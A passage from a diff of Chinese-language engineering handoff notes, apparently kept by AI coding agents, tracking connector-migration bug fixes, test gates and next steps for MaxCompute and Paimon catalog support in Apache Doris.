latest 回归。 -## 🎯 下一 session = G2 + GC1(用户定,2026-06-08) +## 🧠 核心发现(5 区 + 证伪 3 先验,连接器档原 stale) -> **方法论(每 issue)**:recon 核码(**Rule 8,下列 anchor 已核但仍可漂移**)→ 独立设计 `tasks/designs/P4-T06e--design.md` → 设计验证(**⚠️ Ultracode 仍关**:workflow 需用户 opt-in,否则单/双 Agent 对抗或用户定 skip)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ impl-review → 独立 `[P4-T06e]` commit + hash 回填 + tracker。live tracker `plan-doc/task-list-batchD-redline-gaps.md`。 +1. **普通表读取**:最接近 MC 样板,scan 骨架近完工。补缺=transient-Table reload BLOCKER(`PaimonTableHandle:41/73` + `PaimonScanPlanProvider:95` 无 fallback)、session-TZ 谓词 bug(`PaimonPredicateConverter:284` 固定 UTC)、`listPartitions*`、6-arg planScan。 +2. **系统表读取**:须**新建 E7 SPI hook**(greenfield,paimon 首个消费者)+ 通用 `PluginDrivenSysExternalTable`(**必须报 PLUGIN_EXTERNAL_TABLE**,否则路由到将删的 legacy 节点);binlog/audit_log 须按 sysName 强制 JNI(是 DataTable 走 native = 行错且静默)。 +3. **procedure**:**零可迁,doc-only no-op**(fe-core 无 paimon procedure;`expire_snapshots`=iceberg、`CALL paimon.sys.migrate_table`=Spark 两假阳性)。 +4. **DDL**:迁 `PaimonMetadataOps`→`PaimonConnectorMetadata`(连接器远端 + `PluginDrivenExternalCatalog` override edit-log)+ flavor 装配(D-037);**每-flavor authenticator 必须保**(否则 Kerberos DDL 炸);`DorisToPaimonTypeVisitor`→`PaimonTypeMapping` 反向(保留 legacy gap)。 +5. **mtmv**:SPI **MTMV 完全无面(E10 缺)** + paimon 首个真 E5 消费者;MTMV 类型留 fe-core 子类、SPI-neutral 数据经 E5 snapshotId + `ConnectorPartitionInfo.getLastModifiedMillis()`(已存在)。最高 correctness 风险=**单-pin 不变式 + GAP-LISTPART-AT-SNAPSHOT**(at-snapshot 列分区)。 +- **证伪 3 先验**:① backend 模块=空壳(非已建工厂,连接器走单 Catalog stub);② FE 分发部分已预接(DROP/CREATE·DROP DB/SHOW PARTITIONS/TVF,残留=连接器 listPartitions);③ Base64 非 blocker(BE `PaimonUtils:42-47` 有 STD fallback;真风险=pin paimon-core 三方版本对齐)。 -1. **G2 FIX-PREDICATE-COLGUARD(Tier 2,minor,多半不可达)— 连接器**:列不存在守卫反转。legacy `MaxComputeScanNode:415-421/478-484` 谓词引用未知列→抛→丢谓词;新路 `MaxComputePredicateConverter.formatLiteralValue` 取 `columnTypeMap.get(columnName)` 为 null 时静默引号化→下推非法谓词。**已核当前 anchor(G0 已移位)**:`MaxComputePredicateConverter.java:202`(formatLiteralValue) / **`:210-211`** `OdpsType odpsType = columnTypeMap.get(columnName); if (odpsType == null) {...}`——此 null 块即守卫点。实务 bound 谓词只引真列、columnTypeMap key 集与 legacy 一致→**多半不可达**;修=该 null 分支改 throw/skip(对齐 legacy 丢谓词、不下推非法)。低优。 -2. **GC1 FIX-BLOCKID-CAP-CONFIG(Tier 2,minor)— 连接器写路径**:写 block-id 上限硬编 `MAX_BLOCK_COUNT = 20000L`(**已核** `MaxComputeConnectorTransaction.java:72`,用于 `:146`;`:68` 注释已自承硬编 = `Config.max_compute_write_max_block_count` 默认),无视 legacy `MCTransaction.java:165` 读的可调 `Config.max_compute_write_max_block_count`(`Config.java:2156`,`=20000L`)→ 调优部署静默回归。修=连接器读该 Config 值。**⚠️ 关键调研点(未解)**:连接器**禁 import fe-core**(含 `org.apache.doris.common.Config`,import-gate 禁)→ 须查连接器如何拿 fe Config 值:候选 = ConnectorContext / catalog property 透传 / `ConnectorSession.getSessionProperties()`(参 P3-9 limit-opt 经 session prop 读 var、G0 经 `ConnectorSession.getTimeZone()` 的约定)。若无现成透传通道,需**设计定夺**(加 property/context 透传 vs 接受+登记 deviation)——可能需问用户。 +## 🎯 下一 session = P5 分批实现(B0 起) -> 其后(本批之后,**非本 session**):**T3 Tier-3 DV batch(GAP3/4/9/10 登记 deviation,无代码)→ DOC(Batch-D redline 扩充 design §1/§2 must-land-before-delete + scan-node 注补 LIMIT-split 第 3 副本 + 登记 ES `EsTypeMapping:191` 同款 token bug)**。详见下方折叠「第 12 次 handoff」§下一 session 待办 7-8 项。 +- **B0**(无前置):建 `fe-connector-paimon` 测试模块 + no-mockito 注入式 `PaimonCatalogOps` seam + parity baseline(vs 旧 `PaimonScanNode`)+ FE→BE round-trip smoke + **pin paimon-core 版本三方对齐**。 +- **B6**(独立):procedure doc no-op。 +- 续 **B1**(单 Catalog flavor 装配 + 每-flavor authenticator)→ **B2**(普通读补完)+ **B3**(DDL)→ **B4**(E7 sys-table + E5 MVCC)→ **B5**(MTMV 桥)→ **B7 翻闸**(gated on B2+B3+B4+B5 + live e2e)→ **B8 删 legacy** → **B9 回归**。批次依赖图见 [tasks/P5](./tasks/P5-paimon-migration.md)。 ## ⚙️ 操作须知(复用) -- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl : -am` + `-Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-maxcompute`、改 SPI `:fe-connector-api`(**须 -am、连带 rebuild maxcompute + fe-core**)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`/`MVN_EXIT`,勿信后台 task exit code。checkstyle 走 `test` 的 validate 阶段自动跑(或 `checkstyle:check`);import-gate `bash tools/check-connector-imports.sh`(repo 根)。 -- mutation:Edit 改产线一处→跑相关 UT→确认对应 test 变红→Edit 还原;备份产线文件到 `/dev/shm`(RAM,避 `/mnt/disk1` 满时 cp 截断,auto-memory [[doris-build-verify-gotchas]])。改产线令 import 变 unused 时改用「翻转谓词」式 mutation(保 import 用、免 checkstyle 拦——本 session G5-M2 踩过)。 -- 分支 `catalog-spi-05`,本地未 push。本 session 6 commit。未跟踪 `.audit-scratch/`/`conf.cmy/`/`regression-conf.groovy.bak`/`.claude/scheduled_tasks.lock`(勿提交)。 - -## 🧠 给下一个 agent 的 meta -- **live e2e(真实 ODPS)仍是翻闸真正完成门**——本批为静态/UT 层判定;G6 非法属性 CREATE 拒绝须 live 验(登记 DV)。 -- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);测基建无 fe-core/无 mockito、child-first loader([[catalog-spi-fe-core-test-infra]]);P2 DDL 定夺([[catalog-spi-p2-ddl-decisions]],G5 续其 isAutoInc→isAggregated SPI-字段模式);clean-room 对抗偏好([[clean-room-adversarial-review-pref]])。 - -
- ---- - -
📅 历史:第 13 次 handoff(2026-06-08)— G0 FIX-DATETIME-PUSHDOWN-FORMAT 完成 - -# 🔥 第 13 次 handoff(2026-06-08,覆盖)— G0 FIX-DATETIME-PUSHDOWN-FORMAT 完成 - -> **本 session 主题**:续做 Batch-D 红线扩充 gap 修复 campaign 的 **G0**(Tier 1,major correctness/perf)。设计 → (用户定 **skip** 设计验证 workflow)→ 实现 → 守门 → 单 Agent impl-review → 独立 commit。 - -## ✅ 本 session 已完成 -- **G0 FIX-DATETIME-PUSHDOWN-FORMAT(Tier 1)DONE @`0d983a1c056`**:DATETIME/TIMESTAMP/TIMESTAMP_NTZ 谓词下推坏(两 delta)。**delta-1**:`MaxComputePredicateConverter` 用 `String.valueOf(LocalDateTime)`('T' 分隔变精度,如 `"2023-02-02T00:00"`)喂空格定长 formatter → 非 UTC session `LocalDateTime.parse` 抛 → 整 conjunct 树降 `NO_PREDICATE`(谓词永不下推=perf 回归)/ UTC session 推 malformed 字面量。**delta-2**:source TZ 取 project-region(endpoint 推)而非 session TZ → 跨 TZ 静默丢行。**修**(连接器局部、无 SPI 变更,对齐 legacy `MaxComputeScanNode.convertLiteralToOdpsValues`)=① 直接对 `LocalDateTime` 用目标 formatter 格式化(逐字镜像 legacy `getStringValue(DatetimeV2Type(3|6))`,删字符串版 `convertDateTimezone`);② source TZ 改 `ConnectorSession.getTimeZone()`(≡ legacy `DateUtils.getTimeZone()`),TZ id 以**字符串**传入、在 converter 内**惰性** `ZoneId.of`(`convert()` 的 catch 内)。 - - **⚠️ impl-review F1(real regression,已折入)**:初版 `convertFilter` 内 eager `ZoneId.of(session.getTimeZone())`。但 Doris `SET time_zone='CST'`(华区常见,本 Alibaba 连接器尤甚)被 `TimeUtils.checkTimeZoneValidAndStandardize` **逐字存**,而 `java.time.ZoneId.of("CST")` 抛 `ZoneRulesException`(PST/EST/MST 同;UTC/GMT/+08:00/Asia*/Z/PRC OK——已实测)→ eager 解析炸出 `planScan`(无 catch)→ **整查询失败**(含非 datetime 如 `id=5`),比 legacy(per-conjunct catch 降级、仅 datetime 解析 TZ)+ 翻闸前(`resolveProjectTimeZone` 永不抛)双回归。**惰性解析修法** → datetime+CST 降级 `NO_PREDICATE`(BE 兜底,结果仍正确)、非 datetime 仍下推、NTZ 不解析 = **legacy parity**。 - - 守门:编译 + UT `MaxComputePredicateConverterTest` **13/13** + 连接器模块 55(1 skip,live) + checkstyle 0 + import-gate 0 + mutation(M1 `format→toString` 8红 / M2 `忽略 session zone` 3红 → 还原绿)。**真值闸 live ODPS=DV-022**(跨 UTC/非-UTC session TZ datetime 谓词正确下推、不丢行)。 - - 设计 `plan-doc/tasks/designs/P4-T06e-FIX-DATETIME-PUSHDOWN-FORMAT-design.md`。**Batch-D 死代码清理项**:`MCConnectorEndpoint.resolveProjectTimeZone` + `REGION_ZONE_MAP`(~60 行)翻闸后零调用方(本 fix 仅删 provider 内死的私有 wrapper)。 - -## 👤 用户定夺(2026-06-08) -- **G0 design-verify = Skip → 直接 implement**(设计已深度核码:format 字节级对齐 + TZ source 经 `from(ctx)` 确认);仍走守门 + 末端 impl-review。 -- **G0 死代码 = Keep + defer Batch-D**(仅删 provider 内死 wrapper;public 方法+map 留待 Batch-D 清理)。 - -## 🎯 下一 session = 批量修复 G6 + G5 + G7(用户定,2026-06-08) - -> **用户定夺**:下一新 session **同时修复 G6 + G5 + G7**。三者**逻辑独立、触不同区**(G6=连接器 provider 校验 / G5=fe-core 列校验 / G7=类型映射),可并行 research/设计;但各仍走**独立 design doc + 独立 `[P4-T06e]` commit + 各自守门**(不合并 commit)。其后 **G2 / GC1 → T3 Tier-3 DV batch(GAP3/4/9/10 登记 deviation)→ DOC(Batch-D redline 扩充 + scan-node LIMIT-split 注补)**。live tracker `plan-doc/task-list-batchD-redline-gaps.md`。 - -> **方法论(每 issue)**:独立设计 `tasks/designs/P4-T06e--design.md` → 设计验证(**⚠️ Ultracode 仍关**:workflow 需用户 opt-in,否则单/双 Agent 对抗或经用户定 skip)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ impl-review → 独立 commit + hash 回填 + tracker。**动手前按指针核码(Rule 8)**——下列 file:line 为第 12 次 recon,G0 经验示其可漂移。 -> **G0 经验**(auto-memory [[catalog-spi-connector-session-tz-gotcha]]):连接器**禁 import fe-core**(import-gate);mutation 改 API 时用 **in-place cp 备份**(revert-to-HEAD 不可编译);先验 anchor 务必核码。 - -**本批三 issue(独立、可并行):** - -1. **G6 FIX-CREATE-CATALOG-VALIDATION(Tier 2,major)— 连接器(fe-connector-maxcompute)**:CREATE CATALOG 属性校验缺失。`MaxComputeConnectorProvider` **未 override `validateProperties`**(继承 SPI no-op `ConnectorProvider:74-76`;jdbc/es/trino 都 override)→ required PROJECT/ENDPOINT、split_byte_size≥10485760 floor、split_strategy、account_format∈{name,id}、connect/read timeout>0、retry_count>0、`checkAuthProperties`(`MCConnectorClientFactory.checkAuthProperties:42-78` **定义但零调用**)全不在 CREATE 时校验 → use-time 晚失败 / 静默接受非法(account_format='foo'→默认 DISPLAYNAME;负 timeout)。legacy `MaxComputeExternalCatalog.checkProperties:387-457`。**修**=实现 `MaxComputeConnectorProvider.validateProperties`(或 preCreateValidation)镜像 legacy 六校验 + wire `checkAuthProperties`。 - -2. **G5 FIX-AGG-COLUMN-REJECT(Tier 2,minor)— fe-core**:`CREATE TABLE (c INT SUM)` 聚合列拒绝丢失(证伪 P2-8「非-OLAP 路径已覆盖」)。链:`ConnectorColumn` 无 aggType 载体 → `CreateTableInfoToConnectorRequestConverter:90-92` 丢 aggType → `MaxComputeConnectorMetadata.validateColumns:476-498` 不查 → nereids `ColumnDefinition.validate(isOlap=false):358-411` 不拒 bare non-key aggType(`validateKeyColumns:1083` 拒但 gated 在 ENGINE_OLAP-only 块、非-OLAP 不可达)。legacy `MaxComputeMetadataOps:426-429` 拒。**修**=FE-core guard(convert/createTable 路径对 maxcompute engine 拒非空 aggType,因 ConnectorColumn 无 aggType 连接器看不到)。**⚠️ 设计定夺点**:FE-core guard(不动 SPI,倾向)vs 改 SPI 加 `ConnectorColumn.aggType`(如 P2-8 加 isAutoInc,见 [[catalog-spi-p2-ddl-decisions]])。 - -3. **G7 FIX-VOID-TYPE-MAPPING(Tier 2,minor)— 连接器/fe-core 边界**:ODPS `VOID` → 新路映 `UNSUPPORTED`(legacy=`Type.NULL`)。链:`MCTypeMapping:51-52` emit `of("NULL")` → `ConnectorColumnConverter.convertScalarType` 无 "NULL" case → `ScalarType.createType("NULL")` 抛(只认 "NULL_TYPE")被 catch→UNSUPPORTED。次生缺陷:未知 OdpsType legacy 硬抛、新路静默 UNSUPPORTED。**修**=加 "NULL" case 返 `Type.NULL`,或 `MCTypeMapping` emit `of("NULL_TYPE")`(设计时定哪侧)。 - -> G6/G5/G7 完整证据 + 其余待办(G2/GC1/T3/DOC 的 file:line + 修法)见下方折叠「第 12 次 handoff」§下一 session 待办,未变。 - -
- ---- - -
📅 历史:第 12 次 handoff(Batch-D 红线扩充查出 11 gap + 2 critic;G8 已修,G0 见上) - -# 🔥 第 12 次 handoff(2026-06-08,覆盖)— Batch-D 红线扩充查出新 gap 修复 campaign - -> **本 session 主题**:执行横切「**Batch-D 红线扩充**」——跑 clean-room 对抗 workflow `wbw4xszrg`(117 agent,13 carrier-unit × inventory→adversarial-verify + 3 critic)复查 Batch-D 设计「zero survivor」声明的**行为逻辑副本**层面(非仅实例化链)。**查出 11 gap + 2 critic-only finding。Critic-2 独立复核:13 条 per-fix 等价物全 present+wired(前修无回退)。** 这些是 per-fix review 漏掉的**新**发现。 -> **⚠️ 重大发现**:其中 **GAP8 是 live 静默丢行回归**(已修,见下);G5 证伪 P2-8「聚合列已覆盖」;G6 暴 CREATE CATALOG 校验缺失。 - -## ✅ 本 session 已完成 -- **G8 FIX-NONPART-PRUNE-DATALOSS(blocker/correctness)DONE @`e1760d38d86`(+回填 `265cd3fa70f`)**:非分区 plugin 表 `SELECT...WHERE` 静默返 **0 行**。根因=`PluginDrivenExternalTable.supportInternalPartitionPruned()` 返 `!partCols.isEmpty()`(非分区=false) → `PruneFileScanPartition` else 支覆写 `SelectedPartitions(0,{},isPruned=true)` → `PluginDrivenScanNode.getSplits` 短路 0 split。**通用插件层**(CatalogFactory SPI_READY_TYPES={jdbc,es,trino,max_compute} 全经 PluginDrivenExternalTable→LogicalFileScan→PluginDrivenScanNode;当前仅 MC 翻闸暴露)。坏 override=`35cfa50f988`(FIX-PART-GATES,dormant)+`072cd545c54`(P1-4 加短路激活)。修=Option A:`supportInternalPartitionPruned()` 返**无条件 true**(镜像 legacy MaxComputeExternalTable/Iceberg;非分区 pruneExternalPartitions 返 NOT_PRUNED 扫全表)。设计验证 `wijd3qgk0`(4 lens design-sound,1mF+3sF 折入) + impl-review `wza2khdb2`(2 lens approve,0mF)。repro=翻转 `PluginDrivenExternalTablePartitionTest` 钉错不变式断言(mutation 还原即红)。auto-memory [[catalog-spi-nonpartitioned-prune-dataloss]]。 - - 守门:UT 6/6+5/5、mutation 向红、checkstyle 0、import-gate 净。 - -## 👤 用户定夺(2026-06-08,campaign 范围) -- **G8 = Fix now(repro 先行)** → 已完成。 -- **其余 = Fix Tier 1+2,Tier 3 接受+登记 deviation**。 - -## 🎯 下一 session = 续做 gap 修复 campaign(live tracker = `plan-doc/task-list-batchD-redline-gaps.md`) - -> **每 issue 走既有方法论**:独立设计文档 `tasks/designs/P4-T06e--design.md` → 设计验证 workflow(clean-room 对抗)→ 实现 → 守门(编译+UT+checkstyle+import-gate+mutation)→ impl-review workflow 收敛 → 独立 commit(`[P4-T06e]`)+ hash 回填 + 更 tracker。 -> **⚠️ Ultracode 现已关**:跑 workflow 需用户显式 opt-in(或用户说「use a workflow」)。若关态,design-verify/impl-review 可改用单/双 Agent 对抗替代,或先问用户是否要 workflow。 -> 全量 gap 证据:workflow 返回 JSON 在 `/tmp/claude-1000/-mnt-disk1-yy-git-wt-catalog-spi/.../tasks/wbw4xszrg.output`(若 /tmp 清,speca 全在 tracker;摘录曾在 `/tmp/wf_gaps.txt`/`/tmp/wf_critics.txt`)。每 gap 带 file:line + parity + evidence。 - -**按优先序待办(Tier 1+2 fix + Tier 3 DV + 原 doc 交付):** - -1. **G0 FIX-DATETIME-PUSHDOWN-FORMAT(Tier 1,major correctness/perf)— 下一个,本 session 已开始 design 调研**: - - 症状:DATETIME/TIMESTAMP/TIMESTAMP_NTZ 谓词下推坏。**两 delta**: - - **delta-1(format)**:`MaxComputePredicateConverter.formatLiteralValue:201` 用 `String.valueOf(literal.getValue())`,而 literal value 是 `java.time.LocalDateTime`,其 `toString()` 是 **'T' 分隔 + 变精度**(`"2023-02-02T00:00"`);喂 `DATETIME_3/6_FORMATTER`(`"yyyy-MM-dd HH:mm:ss.SSS"` 空格分隔)→ `convertDateTimezone:259` 的 `LocalDateTime.parse` **抛 DateTimeParseException**(非 UTC)被 `convert():86` catch→**整 conjunct 树降 NO_PREDICATE**(谓词永不下推=perf 回归);UTC 路(`convertDateTimezone:256` sourceTZ==UTC 短路)推 **malformed 字面量** `col=="2023-02-02T00:00"` 到 ODPS(结果未定,可能错/可能 ODPS 报错)。legacy `MaxComputeScanNode:558-593` 用 `dateLiteral.getStringValue(DatetimeV2Type(3|6))`(空格分隔定长)正确。 - - **delta-2(TZ source)**:连接器 `sourceTimeZone` = `MaxComputeScanPlanProvider:287-295` 经 `MCConnectorEndpoint.resolveProjectTimeZone(endpoint)`(**project-region TZ**);legacy `convertDateTimezone` 用 `DateUtils.getTimeZone()`(**session TZ**)。format 修后若 TZ 仍错→**丢行**。 - - 修法方向(待设计):① format=直接对 `LocalDateTime` 用目标 formatter(不走 toString()→reparse),即在 DATETIME/TIMESTAMP 分支把 value 当 LocalDateTime 格式化 + TZ 转换;② TZ source=改用 session TZ——**需查连接器如何拿 session TZ**(ConnectorSession 是否带 timezone?现 resolveProjectTimeZone 在 `MaxComputeScanPlanProvider`;legacy 用 ConnectContext session var,连接器不可直达 fe-core)。**关键调研点**:ConnectorSession.getSessionProperties() 是否含 time_zone(参 P3-9 limit-opt 经 session prop 读 var 的约定)。 - - 已读文件:`MaxComputePredicateConverter.java`(formatLiteralValue:195-252 / convertDateTimezone:254-263 / ctor:69-74 / formatters:55-58 / convert catch:84-89)。**待读**:`MaxComputeScanPlanProvider.java:131-133`(dateTimePushDown)`:274-295`(convertFilter+sourceTZ)、`MCConnectorEndpoint.resolveProjectTimeZone:111-125`、`ExprToConnectorExpressionConverter.convertDateLiteral:309-321`(fe-core 存 LocalDateTime)、ConnectorSession 接口(找 timezone)、legacy `MaxComputeScanNode:529-613`(对照)、`DateUtils.getTimeZone:403-408`。**无连接器测覆盖 datetime 格式**——补 `MaxComputePredicateConverter` UT 钉确切下推串 + mutation。真值闸 live ODPS=DV(datetime 谓词正确下推 + 不丢行,跨 UTC/非-UTC project TZ)。 -2. **G6 FIX-CREATE-CATALOG-VALIDATION(Tier 2,major)**:CREATE CATALOG 属性校验缺失。`MaxComputeConnectorProvider`(fe-connector-maxcompute) **未 override `validateProperties`**(继承 SPI no-op `ConnectorProvider:74-76`,cf. jdbc/es/trino 都 override)→ required PROJECT/ENDPOINT、split_byte_size≥10485760 floor、split_strategy、account_format∈{name,id}、connect/read timeout>0、retry_count>0、`MCUtils.checkAuthProperties`(`MCConnectorClientFactory.checkAuthProperties:42-78` **定义但零调用**)全不在 CREATE 时校验 → 退化 use-time 晚失败 / 静默接受非法(account_format='foo'→默认 DISPLAYNAME;负 timeout)。legacy `MaxComputeExternalCatalog.checkProperties:387-457`。修=实现 `MaxComputeConnectorProvider.validateProperties`(或 preCreateValidation)镜像 legacy 六校验 + wire checkAuthProperties。 -3. **G5 FIX-AGG-COLUMN-REJECT(Tier 2,minor)**:`CREATE TABLE (c INT SUM)` 聚合列拒绝丢失(**证伪 P2-8「非-OLAP 路径已覆盖」**)。链:`ConnectorColumn` 无 aggType 载体 → `CreateTableInfoToConnectorRequestConverter:90-92` 丢 aggType → `MaxComputeConnectorMetadata.validateColumns:476-498` 不查 → nereids `ColumnDefinition.validate(isOlap=false):358-411` 不拒 bare non-key aggType(`validateKeyColumns:1083` 拒但 gated 在 ENGINE_OLAP-only 块、非-OLAP 不可达)。legacy `MaxComputeMetadataOps:426-429` 拒。修=FE-core guard(convert/createTable 路径对 maxcompute engine 拒非空 aggType,因 ConnectorColumn 无 aggType 连接器看不到)。 -4. **G7 FIX-VOID-TYPE-MAPPING(Tier 2,minor)**:ODPS `VOID` → 新路映 `UNSUPPORTED`(legacy=`Type.NULL`)。链:`MCTypeMapping:51-52` emit `of("NULL")` → `ConnectorColumnConverter.convertScalarType` 无 "NULL" case → `ScalarType.createType("NULL")` 抛(只认 "NULL_TYPE")被 catch→UNSUPPORTED。次生:未知 OdpsType legacy 硬抛、新路静默 UNSUPPORTED。修=加 "NULL" case 返 Type.NULL,或 MCTypeMapping emit `of("NULL_TYPE")`。 -5. **G2 FIX-PREDICATE-COLGUARD(Tier 2,minor,多半不可达)**:列不存在守卫反转。legacy `MaxComputeScanNode:415-421/478-484` 谓词引用未知列→抛→丢谓词;新路 `MaxComputePredicateConverter.formatLiteralValue:204-206` odpsType==null 静默引号化→下推非法谓词。实务 bound 谓词只引真列、columnTypeMap key 集与 legacy 一致→**多半不可达**;修=加 containsKey 守卫(throw/skip)对齐 legacy。低优,可与 G0 合并(同文件)。 -6. **GC1 FIX-BLOCKID-CAP-CONFIG(Tier 2,minor)**:写 block-id 上限硬编 `20000`(`MaxComputeConnectorTransaction.java:72,146` `MAX_BLOCK_COUNT=20000L`),无视 legacy `Config.max_compute_write_max_block_count`(`MCTransaction:165`,可调)→ 调优部署静默回归。修=读 Config(连接器如何拿 fe Config?可能经 connector context/property 透传,需查)。 -7. **T3 Tier-3 接受项 → 登记 deviation(不修,用户定)**: - - GAP3 CREATE DB 非-IFNE:`ERR_DB_CREATE_EXISTS`(1007/HY000 本地预抛)→透传 ODPS DdlException(P2-6 已注 pre-existing)。 - - GAP4 DROP TABLE 非-IF-EXISTS+远端缺:`ERR_UNKNOWN_TABLE`(1109/42S02)→通用 DdlException(本地名)。 - - GAP9 SHOW PARTITIONS `LIMIT`:legacy paginate-then-sort → 新路 sort-then-paginate(新路更合 ORDER-BY-LIMIT)。 - - GAP10 partitions() TVF:schema-分区但零实例表 legacy 抛→新路返 0 行(已有 in-code 注释声明 intentional)。 - - 动作:在 `plan-doc/deviations-log.md`(或既有 deviations 文档)登记这 4 条 + 各 file:line + 接受理由。 -8. **DOC:Batch-D redline 扩充(原任务交付,仍欠)**:把上述全部行为逻辑副本作为 **must-land-before-delete 红线** 补入 `plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md` §1/§2(镜像现有 MaxComputeScanNode 红线注格式);并**更正 scan-node 红线注**——critic-3 证其漏列 **LIMIT-split 优化(第 3 行为副本)**(等价物在 P3-9,注应 cite)。另 critic-2 提醒:`MetadataGenerator`/`PartitionsTableValuedFunction` 仍有 live-but-dead legacy refs,Batch-D 删 legacy 类前须连这些 reverse-ref 一并删否则不编译(已在 §2,复核)。 - -## ⚙️ 操作须知(本 session 新增/复用) -- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl :fe-core -am`(改连接器 `:fe-connector-maxcompute`)+ `-Dmaven.build.cache.enabled=false`;读真实 `Tests run:`/`BUILD`/`MVN_EXIT`,勿信后台 task exit code。checkstyle `-pl :fe-core checkstyle:check`;import-gate `bash tools/check-connector-imports.sh`。 -- 分支 `catalog-spi-05`,本地未 push。本 session 2 commit(G8 fix + 回填)。 -- auto-memory 新增 [[catalog-spi-nonpartitioned-prune-dataloss]]。clean-room 对抗偏好见 [[clean-room-adversarial-review-pref]];测基建坑见 [[catalog-spi-fe-core-test-infra]]。 - -
- ---- - -
📅 历史:第 11 次 handoff(P3-11/P3-12 完成 → P4-rereview triage 全 code-complete) - -## 📅 最后一次 handoff - -- **日期**:2026-06-08(第 11 次 handoff) -- **本 session 主题**:**P3-11 + P3-12 完成 → 🎉 P3 全清 + 整个 P4-rereview triage(P0-1..3 / P1-4 / P2-5..8 / P3-9..12)全部完成**。各走 设计文档 →(P3-11)设计验证 workflow → 实现 → 守门 → impl-review workflow → 独立 commit + hash 回填。live tracker = `plan-doc/task-list-P4-rereview.md`。 - - **P3-12 FIX-POSTCOMMIT-REFRESH** ✅ `1f2e00d3696`(+`2c4015ac7de` 回填)(NG-8/F15=F21 minor):**无产线逻辑改动**——仅 `PluginDrivenInsertExecutor.doAfterCommit` Javadoc(`:164-176`) 从「只讲 JDBC_WRITE」泛化到覆盖 MC connector-transaction 路径。对抗性安全核查 inline(`handleRefreshTable` 只刷缓存/写 refresh editlog、丢失自愈)。[D-034]/[DV-018]。 - - **P3-11 FIX-BATCH-MODE-SPLIT** ✅ `ac8f0fc15eb`(+`2a43abc6d76` 回填)(NG-7/F6=F13 minor):**用户定「实现 batch SPI 路径」**(Shape A 薄 SPI + fe-core 编排、逐字镜像 legacy)。SPI +2 additive default(`supportsBatchScan`/`planScanForPartitionBatch`,零破坏其余 6 连接器)+ 连接器 `supportsBatchScan`=`fileNum>0` + fe-core `PluginDrivenScanNode` 三 override(`isBatchMode`含 SF-1 null-guard / `numApproximateSplits` / `startSplit` 异步分批)+ 纯静态 `shouldUseBatchMode`。设计验证 `wcpg9lblj` + impl-review `wve7y1jst` 各 GO-WITH-EDITS 折入。守门 mutation 5/5。[D-035]/[DV-019]。 -- **方法论**:每 issue = 设计文档 → 设计验证 workflow(多 lens clean-room 对抗)→ 实现 → 编译+UT+checkstyle+import-gate+mutation → impl-review workflow 收敛 → 独立 commit(fix)+ commit(hash 回填)。 -- **分支**:`catalog-spi-05`(本地,未 push)。本 session 4 commit(P3-11/P3-12 各 fix + hash 回填)。**累计本轮 triage 共 12 issue 全 DONE。** -- **operational 坑(auto-memory `doris-build-verify-gotchas` 已更新)**:mutation 跑中 `/mnt/disk1` **系统级 100% 满**(1.9T/2T,非本 repo 数据——repo target 仅 ~3.65G)致 `cp` 还原失败一度 **truncate 产线文件**;已从 `/dev/shm`(RAM) 备份还原、重跑确认。教训=mutation 还原备份须放 RAM/异盘 + mutation 跑带 `-Dcheckstyle.skip=true`。**⚠️ 磁盘当前 97%,bulk 占用非本 repo,需用户排查。** -- **复审已验层(legacy parity 达成,静态层面)**:返回行结果正确、descriptor/JNI/BE 线、事务生命周期、schema cache、editlog/replay、读裁剪下推(DG-1)、limit-split 三重闸(P3-9)、isKey 元数据(P3-10)、batch-mode 异步 split(P3-11)、post-commit swallow(P3-12)、写分发/静态分区 bind/INSERT OVERWRITE(P0)——均独立验为与 legacy 等价。**triage 已 code-complete;剩余 = ① live e2e 终验(真值闸,真实 ODPS)② Batch-D 删 legacy ③ 若干横切开放项(见下)。** - ---- - -# 🎯 下一 session = triage 已 code-complete,进入「终验 + 收尾」阶段 - -> **本轮 P4-rereview triage 全部完成**:P0-1..3(写 blocker)/ P1-4(读裁剪)/ P2-5..8(DB-DDL/CTAS)/ P3-9..12(写并行/读默认/minors)共 **12 issue 全 DONE**,逐条见下面 🔴/🟠/🟡 段。剩余工作不再是「修 issue」,而是三条收尾线: -> 👉 **下一 session 第一步(按价值/依赖排序)**: -> 1. **🅰 live e2e 终验(真实 ODPS)= 翻闸真正完成门**(最高价值,CI 跳)。所有静态修复的真值闸须 live 验:写 blocker(动态/静态分区、INSERT OVERWRITE,DV-013/014)+ 读裁剪(DV-015)+ limit-split(DV-016)+ DESCRIBE isKey(DV-017)+ post-commit swallow(DV-018)+ batch-mode 大分区(DV-019)+ CAST 谓词不丢行(DV-020:STRING 列 `"5"/"05"/" 5"` 的 `CAST(code AS INT)=5` 返回全部 3 行)。**需真实 ODPS 环境/凭证**——多半要用户提供或在带 ODPS 的环境跑。runbook 见历史 HANDOFF / decisions-log。 -> 2. **🅱 Batch-D = 删 legacy MaxCompute(21 文件)**。**所有 per-fix 红线门现已全清**(P0 写分发/overwrite/bind + P1 读裁剪 + P3-11 batch-mode),故 Batch-D 已**解锁**;但执行仍**gated on 🅰 live e2e**([D-027])。设计 = `plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md`(其 §1「zero survivor」声明已就 MaxComputeScanNode 加红线限定,仍须复查 PhysicalMaxComputeTableSink/allowInsertOverwrite/bindMaxComputeTableSink 三处,见 §横切)。 -> 3. **🅲 横切开放项**(静态、不需 ODPS,可随时清,见下)。 -> -> 📋 **待用户拍板 / 待清的开放项**: -> - **(决策) P2-7 KNOWN PRE-EXISTING GAP**:非-IFNE + FE-cache 命中但远端缺 → legacy 抛 `ERR_TABLE_EXISTS_ERROR`、cutover 静默建表。全 parity 可在 `PluginDrivenExternalCatalog.createTable` 的 `exists && !isIfNotExists()` 加 FE 侧 throw。**待定 fix vs 接受+DV**(见 FIX-CTAS review-rounds)。 -> - **(doc-sync 欠账 — P2 session 遗留,已核实仍未落)**:decisions-log 登记 P2 三处 SPI 改动(4 参 `dropDatabase` / `supportsCreateDatabase` / `ConnectorColumn.isAutoInc`);deviations-log 登记(P2-7 非-IFNE 